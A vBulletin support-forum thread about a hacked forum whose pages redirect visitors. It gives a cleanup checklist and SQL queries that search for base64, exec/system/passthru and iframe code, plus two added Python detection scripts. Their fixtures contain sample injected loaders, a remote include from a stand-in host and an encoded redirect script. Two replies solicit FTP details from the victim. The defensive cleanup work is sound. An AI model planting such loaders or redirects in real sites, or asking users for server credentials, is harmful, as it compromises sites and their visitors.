Site Hacked

  • #16
    Follow these steps.
    Originally posted by Wayne Luke View Post
    Here are the steps to check for hacks:

    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

    5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

    Query for steps 4 and 5:
    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

    7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

    It checks the templates for compromising code.

    8) Check .htaccess to make sure there are no redirects there. This isn't a vBulletin issue but customers really don't understand that.



    After a few quick checks, it looks like a basic template replacement scheme. Step 7 should expose such a scheme.
    Originally posted by sdfontanini View Post
    Updated again to 4.1.9 and it looks like I now have access to the AdminCP


    But where to go from here???
    Also make sure that your master password has been changed to something that you know but others don't. Same with your own password.
    Aussiefootyforums

    New Site New forum
    Come and talk sports all day long
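The steps quoted above are a manual procedure. As an added example that is not part of this thread or of vBulletin itself, the Python script below applies the same checks offline: steps 3 and 7 against template rows, steps 4 to 6 against plugin rows (both shaped like rows exported from the `template` and `plugin` tables, for instance through phpMyAdmin), and step 8 against a copy of `.htaccess`. Two deliberate differences from the thread's LIKE queries, both assumptions of this example: it matches function-call forms such as `exec(` rather than bare substrings, so a variable named `$executed` is not reported, and it also checks `passthru(`, which is how PHP actually spells that function, so the `'%pass_thru%'` pattern alone would not find it. The sample rows at the bottom are constructed for the demo.

```python
import re

# Step 3: templates in which an <iframe> is expected, as listed in the thread.
IFRAME_ALLOWED_TEMPLATES = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css",
    "vbcms.css", "vbulletin.css", "help_bbcodes", "humanverify_recaptcha",
    "search_common", "search_common_select_type",
}

# Steps 4-6: function-call forms rather than bare substrings. PHP's function is
# spelled passthru(); the thread's LIKE '%pass_thru%' would miss it, so both are here.
PLUGIN_PATTERNS = {
    "base64": re.compile(r"\bbase64_(?:decode|encode)\s*\(", re.I),
    "shell": re.compile(
        r"\b(?:exec|shell_exec|system|passthru|pass_thru|popen|proc_open)\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    # Step 4: include/require of something that is not a plain local file path.
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\b[\s(]*['\"]?(?:https?|ftp|php|data):", re.I),
    "iframe": re.compile(r"<iframe\b", re.I),
}

# Step 7: the same indicators applied to template source; atob() is the
# browser-side counterpart of base64_decode().
TEMPLATE_PATTERNS = {
    "base64": re.compile(r"base64|\batob\s*\(", re.I),
    "shell": PLUGIN_PATTERNS["shell"],
    "eval": PLUGIN_PATTERNS["eval"],
    "iframe": PLUGIN_PATTERNS["iframe"],
}

# Step 8: .htaccess directives that send visitors to another URL.
HTACCESS_REDIRECT = re.compile(
    r"\s*(?:Redirect(?:Match|Permanent|Temp)?\b"
    r"|RewriteRule\b.*\bhttps?://"
    r"|ErrorDocument\b.*\bhttps?://)", re.I)


def scan_plugins(rows):
    """Return [(title, hookname, product, [indicator, ...])] for matching plugin rows."""
    findings = []
    for row in rows:
        code = row.get("phpcode", "")
        hits = [name for name, rx in PLUGIN_PATTERNS.items() if rx.search(code)]
        if hits:
            findings.append((row["title"], row["hookname"], row["product"], hits))
    return findings


def scan_templates(rows):
    """Return [(styleid, title, [indicator, ...])] for matching template rows.
    An <iframe> is only reported in templates outside the step-3 allow-list."""
    findings = []
    for row in rows:
        src = row.get("template", "")
        hits = [name for name, rx in TEMPLATE_PATTERNS.items() if rx.search(src)]
        if "iframe" in hits and row["title"] in IFRAME_ALLOWED_TEMPLATES:
            hits.remove("iframe")
        if hits:
            findings.append((row["styleid"], row["title"], hits))
    return findings


def scan_htaccess(text):
    """Return the .htaccess lines that redirect visitors (step 8)."""
    return [line.strip() for line in text.splitlines() if HTACCESS_REDIRECT.match(line)]


# Constructed sample rows (not real data) so the script runs stand-alone.
SAMPLE_PLUGINS = [
    {"title": "Clean plugin", "hookname": "global_start", "product": "vbulletin",
     "phpcode": "$vbulletin->options['foo'] = 1;"},
    {"title": "Dropped loader", "hookname": "global_start", "product": "vbulletin",
     "phpcode": "eval(base64_decode('ZWNobyAxOw=='));"},
    {"title": "Remote include", "hookname": "init_startup", "product": "vbulletin",
     "phpcode": "include_once('http://example.invalid/s.txt');"},
]
SAMPLE_TEMPLATES = [
    {"styleid": 1, "title": "spacer_open", "template": '<div class="page"></div>'},
    {"styleid": 1, "title": "bbcode_video", "template": '<iframe src="{vb:raw url}"></iframe>'},
    {"styleid": 1, "title": "header",
     "template": '<iframe src="http://example.invalid/" width="0" height="0"></iframe>'},
    {"styleid": 1, "title": "footer",
     "template": '<script>document.write(atob("PHNjcmlwdD4="));</script>'},
]
SAMPLE_HTACCESS = """RewriteEngine On
RewriteRule ^(.*)$ http://example.invalid/$1 [R,L]
Options -Indexes
"""

if __name__ == "__main__":
    for finding in scan_plugins(SAMPLE_PLUGINS):
        print("plugin:", finding)
    for finding in scan_templates(SAMPLE_TEMPLATES):
        print("template:", finding)
    for line in scan_htaccess(SAMPLE_HTACCESS):
        print("htaccess:", line)
```

Every hit is something to read, not proof of compromise: a data URI in a CSS template contains the string "base64", and an addon may legitimately call a shell function. The allow-list and the call-form patterns only cut the noise down to a list a person can review.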




    • #17
      I do not believe this is a hack, frankly, a ridiculous thread was opened, the first ad does not put any sane hackers hack the pages. The second issue here in the form of hacking a site that has been opened and the solution is not sought.

      If you are really hacking, please send me the FTP details. How to Hack if a site is the site for you, I'd saved.



      • #18
        Originally posted by Seo Engineer View Post
        I do not believe this is a hack, frankly, a ridiculous thread was opened, the first ad does not put any sane hackers hack the pages. The second issue here in the form of hacking a site that has been opened and the solution is not sought.

        If you are really hacking, please send me the FTP details. How to Hack if a site is the site for you, I'd saved.
        That makes no sense



        • #19
          I've got other sites on my server and none of them are affected by this, can't understand how this redirect works, and why it's only affecting my vbulletin page

          I've checked my cpanel and no redirects were made, I'm stumped
          www.coloradoevo.com



          • #20
            When I ran a diagnostics on file versions I noticed

            index.php - File does not contain expected contents...

            this is confusing since it's a copy right from the 4.1.9 update
            www.coloradoevo.com



            • #21
              Every page gets redirected back to this Hacker Main Page
              www.coloradoevo.com



              • #22
                can someone post their .htaccess code, not sure what it's supposed to look like
                www.coloradoevo.com



                • #23
                  Originally posted by sdfontanini View Post
                  I get a 404 Error in my browser when I go to www.coloradoevo.com/admincp

                  This is getting frustrating...

                  I can not find any index.html files in my root folder, not sure how this thing is working... completely baffled
                  Your forums are installed in http://www.coloradoevo.com/forums/. So your admincp would be http://www.coloradoevo.com/forums/admincp/

                  Originally posted by sdfontanini View Post
                  can someone post their .htaccess code, not sure what it's supposed to look like
                  Not sure what you mean... it will be different per site.
                  Translations provided by Google.

                  Wayne Luke
                  The Rabid Badger - a vBulletin Cloud demonstration site.
                  vBulletin 5 API



                  • #24
                    Check your template spacer_open. I cleaned up a forum this morning with a similar redirect. There was base64 encoded code in that template causing every page to redirect because every forum page uses that template.

                    Use phpmyadmin to check your template table manually if you have to- look for spacer_open, and see if you have encoded text.
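The advice above is to look for encoded text in a template that every page renders. As an added example that is neither BirdOPrey5's nor vBulletin's code, the Python script below pulls base64-looking runs out of a template's source, decodes them as text only (never evaluates them), and reports any blob whose decoded content contains a redirect marker such as `window.location` or a `<meta http-equiv="refresh">`. The clean spacer_open sample is taken from the thread; the tampered copy with an appended script tag is constructed here, with its payload built by `base64.b64encode` at run time.

```python
import base64
import binascii
import re

# A run long enough to carry a payload; shorter runs are mostly ordinary identifiers.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Strings a decoded blob would contain if its purpose is to send visitors elsewhere.
REDIRECT_MARKERS = (
    "window.location", "document.location", "location.href", "location.replace",
    'http-equiv="refresh"', "<iframe", 'header("location', "header('location",
)


def decode_base64_runs(source):
    """Return [(encoded, decoded_text)] for every run that decodes to readable text.
    The blob is decoded and inspected only; nothing in it is executed."""
    results = []
    for match in B64_RUN.finditer(source):
        encoded = match.group(0)
        try:
            text = base64.b64decode(encoded, validate=True).decode("utf-8")
        except (binascii.Error, ValueError):  # bad alphabet, padding or not UTF-8
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            results.append((encoded, text))
    return results


def redirect_indicators(decoded_text):
    """Return the redirect markers present in the decoded text (case-insensitive)."""
    lower = decoded_text.lower()
    return [marker for marker in REDIRECT_MARKERS if marker in lower]


def audit_template(title, source):
    """Return one finding per decoded blob that carries a redirect marker."""
    findings = []
    for encoded, text in decode_base64_runs(source):
        hits = redirect_indicators(text)
        if hits:
            findings.append({"template": title, "encoded": encoded[:24] + "...",
                             "decoded": text, "indicators": hits})
    return findings


# Constructed sample: the clean spacer_open posted in the thread, and a copy with
# an injected script tag whose payload is built here rather than hand-typed.
CLEAN_SPACER_OPEN = """<!-- open content container -->
<if condition="$show['old_explorer']">
<table cellpadding="0" cellspacing="0" border="0" width="$stylevar[outertablewidth]" align="center"><tr><td class="page">
<else />
<div align="center">
<div class="page" style="width:$stylevar[outerdivwidth]; text-align:$stylevar[left]">
</if>
"""
_PAYLOAD = base64.b64encode(
    b'<script>window.location="http://example.invalid/";</script>').decode()
TAMPERED_SPACER_OPEN = CLEAN_SPACER_OPEN + (
    '<script>document.write(atob("' + _PAYLOAD + '"));</script>\n')

if __name__ == "__main__":
    print("clean:", audit_template("spacer_open", CLEAN_SPACER_OPEN))
    for finding in audit_template("spacer_open", TAMPERED_SPACER_OPEN):
        print("tampered:", finding["indicators"], "->", finding["decoded"])
```

Decoding rather than pattern-matching is what tells a data-URI image apart from a hidden redirect: the image decodes to binary and is skipped, the script decodes to readable markup and is reported with its plain-text content so the reviewer can see exactly where visitors were being sent.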



                    • #25
                      Originally posted by BirdOPrey5 View Post
                      Check your template spacer_open. I cleaned up a forum this morning with a similar redirect. There was base64 encoded code in that template causing every page to redirect because every forum page uses that template.

                      Use phpmyadmin to check your template table manually if you have to- look for spacer_open, and see if you have encoded text.
                      I don't see any anomalies,


                      <!-- open content container -->
                      <if condition="$show['old_explorer']">
                      <table cellpadding="0" cellspacing="0" border="0" width="$stylevar[outertablewidth]" align="center"><tr><td class="page" style="padding:0px $stylevar[spacersize]px 0px $stylevar[spacersize]px">
                      <else />
                      <div align="center">
                      <div class="page" style="width:$stylevar[outerdivwidth]; text-align:$stylevar[left]">
                      <div style="padding:0px $stylevar[spacersize]px 0px $stylevar[spacersize]px" align="$stylevar[left]">
                      </if>
                      www.coloradoevo.com



                      • #26
                        Is the problem Solved !!
                        Cuz I was a Hacker and i know what Hackers DO
                        so I can Help u [email protected] !



                        • #27
                          I believe they used Perl to overwrite or mask my pages forum directory

                          I deleted a few directories that weren't originally in the root folder including

                          perl
                          perl5



                          Now I have the following additional folders

                          .cpan - deleted
                          .HttpRequest
                          .MirrorSearch
                          Last edited by sdfontanini; Sat 14 Jan '12, 4:47pm.
                          www.coloradoevo.com



                          • #28
                            Went through these steps with no luck


                            Originally posted by Wayne Luke View Post
                            Here are the steps to check for hacks:

                            1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

                            deleted all suspected files

                            2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

                            Updated as I updated vBulletin again to 4.1.10

                            3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

                            there's a million templates, how would someone search through all of them?

                            4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

                            Not sure how to do this step

                            5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

                            Disables all plugins

                            6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

                            Query for steps 4 and 5:
                            SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%pass_thru%' OR phpcode LIKE '%iframe%';

                            7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%pass_thru%' OR template LIKE '%iframe%';

                            It checks the templates for compromising code.

                            Lost with this one

                            8) Check .htaccess to make sure there are no redirects there. This isn't a vBulletin issue but customers really don't understand that.


                            my .htaccess file is completely empty, nothing in the file......

                            After a few quick checks, it looks like a basic template replacement scheme. Step 7 should expose such a scheme.
                            www.coloradoevo.com



                            • #29
                              When I re-ran the suspect file versions, these files were again suspect

                              forum.php File not recognized as part of vBulletin
                              index.php File does not contain expected contents
                              /clientscript
                              vbulletin-read-marker.js File not recognized as part of vBulletin
                              vbulletin-threadbit.js File not recognized as part of vBulletin
                              vbulletin_global.js File not recognized as part of vBulletin
                              ./includes/cron
                              vbcms_dailycleanup.php File not recognized as part of vBulletin
                              Please Help my forum has now been down almost a month and people are getting sorta upset.
                              www.coloradoevo.com



                              • #30
                                Steps 3,4,5,6,& 7 which involve 'looking' in the templates or plugins for things mean you need to look at these things in the database. Run a query in your template table looking for 'iframe' or in your plugins looking for 'base64'. You may want to consider hiring someone to do this if you aren't wanting to learn (google is a BIG help here!) how to do this yourself.


                                Easiest thing would have been to upload a database backup from before you were hacked (which you seem to have never made). Please do yourself a favor and spend the time right now that you would normally spend on your forum and learn how to make database backups and how to import them into a new database. It will be time well spent for the next time this may happen.

                                Please don't PM or VM me for support - I only help out in the threads.
                                vBulletin Manual & vBulletin 4.0 Code Documentation (API)
                                Want help modifying your vbulletin forum? Head on over to vbulletin.org
                                If I post CSS and you don't know where it goes, throw it into the additional.css template.

                                W3Schools <- awesome site for html/css help
